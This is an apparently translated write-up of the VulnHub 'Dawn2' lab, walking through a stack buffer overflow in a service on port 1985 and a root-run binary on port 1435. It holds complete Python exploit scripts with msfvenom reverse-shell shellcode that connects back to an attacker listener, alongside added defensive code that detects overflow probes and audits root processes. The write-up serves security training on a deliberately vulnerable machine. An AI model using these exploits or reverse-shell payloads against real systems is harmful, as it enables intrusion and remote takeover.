VulnHub Lab | Dawn2

admin, 2025-01-11 13:35:28

    "There is scenery both in front of and behind the mountain; with or without wind, one is free."

Project URL:

https://download.vulnhub.com/sunset/dawn2.7z

Difficulty: medium
Deployment environment: VirtualBox
Network mode: bridged
Target IP: 192.168.31.174

Host discovery:

Full port scan:

Port 80 information gathering:

A zip archive is found on the web server; downloading and extracting it reveals an executable.

Vulnerability discovery:

Run dawn.exe

Check which ports are open now:

Port 1985 is now open. The nmap scan of the target also showed port 1985 open, so this program is what runs on the target's port 1985. On Windows, test the program for a buffer overflow with the Immunity Debugger dynamic debugging tool: open and run dawn.exe in Immunity Debugger.

On Kali, use Python to open a socket connection and send the payload:

```python
import socket

# Send 500 'A' bytes followed by a null byte to the listener
payload = 'A' * 500 + '\x00'
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.31.111', 1985))
    s.send(payload.encode())
    s.close()
    print("payload send successfully")
except Exception as e:
    print(e)
    print("error")
```

Both the EIP and ESP registers are filled with the character 'A', so there is a buffer overflow vulnerability.

Testing shows that 272 bytes of padding are needed before EIP is overwritten: BBBB lands exactly in EIP, and the CCCC... that follows is what ESP points at.

```python
import socket

# 272 bytes of padding, then BBBB into EIP, then the bytes ESP will point at
payload = 'A' * 272 + 'BBBB' + 'CCCCCCCCCCCCCCCC' + '\x00'
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.31.111', 1985))
    s.send(payload.encode())
    s.close()
except Exception as e:
    print(e)
    print("error")
```

In the debugger, find the address of a JMP ESP instruction, place the generated shellcode after the EIP position, and replace the value in EIP with the address of the JMP ESP instruction. ESP points at the bytes that follow, so if the CPU can be made to execute a jump to ESP, the shellcode will run.

First, mona.py has to be added to Immunity Debugger.

Download mona.py from GitHub and place it in the PyCommands folder of the Immunity Debugger installation directory.

Mona project: https://github.com/corelan/mona

Use mona to find the address of a jmp esp instruction: !mona jmp -r esp

0x345964ba

0x34581777

Generate reverse shell shellcode with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.31.96 LPORT=8888 -b "\x00" -f c EXITFUNC=thread

Write the exploit in Python:

```python
#!/usr/bin/python
import socket

# msfvenom windows/shell_reverse_tcp shellcode (bad character \x00 excluded)
buff = (
    b"\xda\xc4\xbd\x36\xcc\xf1\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"
    b"\x52\x31\x6e\x17\x83\xc6\x04\x03\x58\xdf\x13\xcb\x58\x37\x51"
    b"\x34\xa0\xc8\x36\xbc\x45\xf9\x76\xda\x0e\xaa\x46\xa8\x42\x47"
    b"\x2c\xfc\x76\xdc\x40\x29\x79\x55\xee\x0f\xb4\x66\x43\x73\xd7"
    b"\xe4\x9e\xa0\x37\xd4\x50\xb5\x36\x11\x8c\x34\x6a\xca\xda\xeb"
    b"\x9a\x7f\x96\x37\x11\x33\x36\x30\xc6\x84\x39\x11\x59\x9e\x63"
    b"\xb1\x58\x73\x18\xf8\x42\x90\x25\xb2\xf9\x62\xd1\x45\x2b\xbb"
    b"\x1a\xe9\x12\x73\xe9\xf3\x53\xb4\x12\x86\xad\xc6\xaf\x91\x6a"
    b"\xb4\x6b\x17\x68\x1e\xff\x8f\x54\x9e\x2c\x49\x1f\xac\x99\x1d"
    b"\x47\xb1\x1c\xf1\xfc\xcd\x95\xf4\xd2\x47\xed\xd2\xf6\x0c\xb5"
    b"\x7b\xaf\xe8\x18\x83\xaf\x52\xc4\x21\xa4\x7f\x11\x58\xe7\x17"
    b"\xd6\x51\x17\xe8\x70\xe1\x64\xda\xdf\x59\xe2\x56\x97\x47\xf5"
    b"\x99\x82\x30\x69\x64\x2d\x41\xa0\xa3\x79\x11\xda\x02\x02\xfa"
    b"\x1a\xaa\xd7\xad\x4a\x04\x88\x0d\x3a\xe4\x78\xe6\x50\xeb\xa7"
    b"\x16\x5b\x21\xc0\xbd\xa6\xa2\x2f\xe9\xb7\x52\xd8\xe8\xc7\xb0"
    b"\xa0\x64\x21\xde\xc0\x20\xfa\x77\x78\x69\x70\xe9\x85\xa7\xfd"
    b"\x29\x0d\x44\x02\xe7\xe6\x21\x10\x90\x06\x7c\x4a\x37\x18\xaa"
    b"\xe2\xdb\x8b\x31\xf2\x92\xb7\xed\xa5\xf3\x06\xe4\x23\xee\x31"
    b"\x5e\x51\xf3\xa4\x99\xd1\x28\x15\x27\xd8\xbd\x21\x03\xca\x7b"
    b"\xa9\x0f\xbe\xd3\xfc\xd9\x68\x92\x56\xa8\xc2\x4c\x04\x62\x82"
    b"\x09\x66\xb5\xd4\x15\xa3\x43\x38\xa7\x1a\x12\x47\x08\xcb\x92"
    b"\x30\x74\x6b\x5c\xeb\x3c\x8b\xbf\x39\x49\x24\x66\xa8\xf0\x29"
    b"\x99\x07\x36\x54\x1a\xad\xc7\xa3\x02\xc4\xc2\xe8\x84\x35\xbf"
    b"\x61\x61\x39\x6c\x81\xa0"
)

# 272 bytes of padding up to EIP, the JMP ESP address 0x34581777 in little-endian
# byte order, a 32-byte NOP sled, the shellcode, and a terminating null byte.
# Bytes literals are used so the script behaves the same under python2 and python3.
payload = b"A" * 272 + b"\x77\x17\x58\x34" + b"\x90" * 32 + buff + b"\x00"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.31.111', 1985))
    s.send(payload)
    s.close()
    print("payload send successfully")
except Exception as e:
    print(e)
    print("error")
```

Listen on port 8888 on Kali and run the exploit with python2.
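From the defender's side, the two message shapes sent above (the 500-byte crash probe and the exploit layout of padding, little-endian return address, NOP sled and shellcode) are easy to recognise on the wire. The following Python checker is an added example, not code from the writeup: it inspects messages destined for a simple text service and reports those shapes. The sample messages, the thresholds (MAX_SANE_LEN, MIN_RUN, MIN_SLED, MAX_NONPRINT) and the 0xcc stand-in for shellcode bytes are constructed assumptions; the return address 0x34581777 is the one the writeup uses.

```python
import re
import struct

# Constructed sample messages modelled on what the 1985/tcp listener would receive:
# a normal short message, the 500 x 'A' crash probe, and a message laid out like the
# exploit (272 bytes of filler, a 4-byte return address, a NOP sled, a blob of 0xcc
# stand-in bytes where shellcode would sit, a terminating null). Not captured traffic.
SAMPLES = {
    "benign": b"hello dawn\n",
    "probe": b"A" * 500 + b"\x00",
    "exploit_like": b"A" * 272 + b"\x77\x17\x58\x34" + b"\x90" * 32 + b"\xcc" * 40 + b"\x00",
}

MAX_SANE_LEN = 256   # assumption: the service is only meant to receive short text lines
MIN_RUN = 64         # a run of one repeated byte this long is a typical overflow probe
MIN_SLED = 16        # this many consecutive 0x90 bytes looks like an x86 NOP sled
MAX_NONPRINT = 0.10  # fraction of non-printable bytes tolerated in a text protocol
NOP_SLED = re.compile(b"\x90{%d,}" % MIN_SLED)


def longest_run(data):
    """Return (byte_value, length, offset) of the longest run of one repeated byte."""
    best = (None, 0, 0)
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i, i)
        i = j
    return best


def analyse(data):
    """Inspect one message and return a list of human-readable findings (empty = clean)."""
    findings = []
    if len(data) > MAX_SANE_LEN:
        findings.append("oversized message (%d bytes > %d)" % (len(data), MAX_SANE_LEN))

    value, run_len, offset = longest_run(data)
    if run_len >= MIN_RUN:
        findings.append("run of %d x 0x%02x at offset %d" % (run_len, value, offset))
        # Whatever follows the filler is where an overwritten return address would be;
        # decode it little-endian, the way the exploit packs its JMP ESP address.
        tail = data[offset + run_len:offset + run_len + 4]
        if len(tail) == 4:
            addr = struct.unpack("<I", tail)[0]
            findings.append("possible return address 0x%08x after filler" % addr)

    m = NOP_SLED.search(data)
    if m:
        findings.append("NOP sled of %d bytes at offset %d" % (len(m.group()), m.start()))

    if data:
        nonprint = sum(1 for b in data if (b < 0x20 and b not in b"\r\n\t") or b >= 0x7f)
        ratio = nonprint / len(data)
        if ratio > MAX_NONPRINT:
            findings.append("%.0f%% non-printable bytes in a text protocol" % (ratio * 100))
    return findings


if __name__ == "__main__":
    for name, msg in SAMPLES.items():
        print(name, "->", analyse(msg) or "clean")
```

The same checks belong in the service itself: rejecting messages longer than the buffer it reads into would have closed the vulnerability outright, and logging oversized or mostly binary messages gives the operator the crash probe as an early warning before any working exploit arrives.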

Exploitation:

Modify the exploit: change the connection IP to the target's IP and regenerate the shellcode for Linux:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.31.96 LPORT=8888 -f c -b '\x00' EXITFUNC=thread

Modified exploit:

```python
#!/usr/bin/python
import socket

# msfvenom linux/x86/shell_reverse_tcp shellcode (bad character \x00 excluded)
buff = (
    b"\xdd\xc0\xd9\x74\x24\xf4\x58\x2b\xc9\xbb\xca\x52\x3b\x9d\xb1"
    b"\x12\x31\x58\x17\x03\x58\x17\x83\x22\xae\xd9\x68\x83\x94\xe9"
    b"\x70\xb0\x69\x45\x1d\x34\xe7\x88\x51\x5e\x3a\xca\x01\xc7\x74"
    b"\xf4\xe8\x77\x3d\x72\x0a\x1f\x7e\x2c\xf3\xbf\x16\x2f\x0c\x1d"
    b"\x5f\xa6\xed\xd1\xf9\xe9\xbc\x42\xb5\x09\xb6\x85\x74\x8d\x9a"
    b"\x2d\xe9\xa1\x69\xc5\x9d\x92\xa2\x77\x37\x64\x5f\x25\x94\xff"
    b"\x41\x79\x11\xcd\x02"
)

# Same layout as before: 272 bytes of padding, JMP ESP address 0x34581777
# little-endian, 32-byte NOP sled, shellcode, terminating null byte
payload = b"A" * 272 + b"\x77\x17\x58\x34" + b"\x90" * 32 + buff + b"\x00"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.31.174', 1985))
    s.send(payload)
    s.close()
    print("payload send successfully")
except Exception as e:
    print(e)
    print("error")
```

Listen on port 8888 on Kali and run the exploit with python2.

Flag 1:

Privilege escalation:

The home directory of dawn-daemon contains a file dawn-BETA.exe, and its owner is root.

Looking at the process list, this program appears to be running as root.
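The combination just observed, a root-owned binary sitting in an unprivileged user's home directory and running as root, is exactly what a host audit should flag, because any memory-corruption bug in that binary becomes a root compromise. The Python audit below is an added example, not part of the writeup or the target's tooling: it parses the output of `ps -eo user,pid,args` and `ls -l` and cross-references the two. The sample outputs (PS_OUTPUT, LS_OUTPUT), the PIDs and the list of trusted system directories are constructed assumptions modelled on the situation described above.

```python
import re

# Constructed sample output of `ps -eo user,pid,args`, modelled on the writeup
# (a root-owned dawn-BETA.exe in dawn-daemon's home running as root). Not real output.
PS_OUTPUT = """\
USER         PID COMMAND
root           1 /sbin/init
root         512 /home/dawn-daemon/dawn-BETA.exe
dawn-daemon  520 /home/dawn-daemon/dawn.exe
www-data     601 /usr/sbin/apache2 -k start
"""

# Constructed sample output of `ls -l` for the files in that home directory.
LS_OUTPUT = """\
-rwxr-xr-x 1 root        root        16384 Jan 11 12:00 /home/dawn-daemon/dawn-BETA.exe
-rwxr-xr-x 1 dawn-daemon dawn-daemon 16384 Jan 11 12:00 /home/dawn-daemon/dawn.exe
-rw-r--r-- 1 dawn-daemon dawn-daemon  1024 Jan 11 12:00 /home/dawn-daemon/.bashrc
"""

# Assumption: binaries under these prefixes are package-managed and trusted.
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/", "/lib/", "/opt/")


def parse_ps(text):
    """Yield (user, pid, exe_path) for each process line, skipping the header."""
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        user, pid, args = parts
        yield user, int(pid), args.split()[0]


def parse_ls(text):
    """Return {path: (owner, group, mode)} from long-listing lines."""
    entries = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 9:
            continue
        entries[parts[-1]] = (parts[2], parts[3], parts[0])
    return entries


def root_processes_outside_system_dirs(ps_text):
    """Root processes whose executable is not under a trusted system directory."""
    return [(pid, path) for user, pid, path in parse_ps(ps_text)
            if user == "root" and not path.startswith(SYSTEM_DIRS)]


def root_owned_files_in_user_homes(ls_text):
    """Files under /home/<user>/ that are owned by root rather than by that user."""
    hits = []
    for path, (owner, _group, _mode) in parse_ls(ls_text).items():
        m = re.match(r"/home/([^/]+)/", path)
        if m and owner == "root" and m.group(1) != "root":
            hits.append(path)
    return hits


def audit(ps_text, ls_text):
    """Root processes whose binary is a root-owned file inside a user's home directory."""
    root_owned = set(root_owned_files_in_user_homes(ls_text))
    return [(pid, path) for pid, path in root_processes_outside_system_dirs(ps_text)
            if path in root_owned]


if __name__ == "__main__":
    for pid, path in audit(PS_OUTPUT, LS_OUTPUT):
        print("root process %d runs a root-owned binary from a user home: %s" % (pid, path))
```

Either finding alone is worth a look; the intersection is the one to fix first, by running the daemon as a dedicated unprivileged account and moving its binary out of a user-writable path.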

Exploitation follows the same steps as above:

```python
#!/usr/bin/python
import socket

# Same msfvenom linux/x86/shell_reverse_tcp shellcode as before
buff = (
    b"\xdd\xc0\xd9\x74\x24\xf4\x58\x2b\xc9\xbb\xca\x52\x3b\x9d\xb1"
    b"\x12\x31\x58\x17\x03\x58\x17\x83\x22\xae\xd9\x68\x83\x94\xe9"
    b"\x70\xb0\x69\x45\x1d\x34\xe7\x88\x51\x5e\x3a\xca\x01\xc7\x74"
    b"\xf4\xe8\x77\x3d\x72\x0a\x1f\x7e\x2c\xf3\xbf\x16\x2f\x0c\x1d"
    b"\x5f\xa6\xed\xd1\xf9\xe9\xbc\x42\xb5\x09\xb6\x85\x74\x8d\x9a"
    b"\x2d\xe9\xa1\x69\xc5\x9d\x92\xa2\x77\x37\x64\x5f\x25\x94\xff"
    b"\x41\x79\x11\xcd\x02"
)

# For dawn-BETA.exe the padding before EIP is 13 bytes, the JMP ESP address is
# 0x52501513 (little-endian below) and the service listens on port 1435
payload = b"A" * 13 + b"\x13\x15\x50\x52" + b"\x90" * 32 + buff + b"\x00"
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.31.174', 1435))
    s.send(payload)
    s.close()
    print("payload send successfully")
except Exception as e:
    print(e)
    print("error")
```

Flag 2:

Originally published on the WeChat official account 0x00实验室: VulnHub靶场 | Dawn2

Disclaimer: the programs (methods) covered in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site bears no legal or joint liability. For questions, contact us by e-mail (a corporate or otherwise valid mailbox is recommended so the message is not filtered; contact details are on the home page).
Original link (CN-SEC): https://cn-sec.com/archives/1208967.html